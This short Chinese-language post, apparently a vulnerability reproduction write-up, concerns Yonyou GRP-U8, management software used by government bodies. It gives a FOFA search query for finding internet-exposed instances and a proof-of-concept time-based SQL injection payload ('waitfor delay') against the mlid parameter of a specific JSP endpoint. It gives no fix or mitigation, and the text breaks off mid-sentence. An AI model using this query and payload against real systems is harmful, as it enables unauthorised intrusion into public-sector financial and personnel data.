简介
用友GRP-U8是用友软件针对政府及公共部门推出的管理软件产品。
GRP是Government Resource Planning的缩写,即政府资源计划。
这个产品设计用于满足政府部门在财务管理、人力资源管理、资产管理、供应链管理等方面的需求。
漏洞复现
FOFA:
app="用友-GRP-U8"
访问界面如下所示:
POC:
/u8qx/dialog_moreUser_check.jsp?mlid=1
/u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:5'--
拼接url访问返回信息如下所示:
ip:port/u8qx/dialog_moreUser_check.jsp?mlid=1
POC访
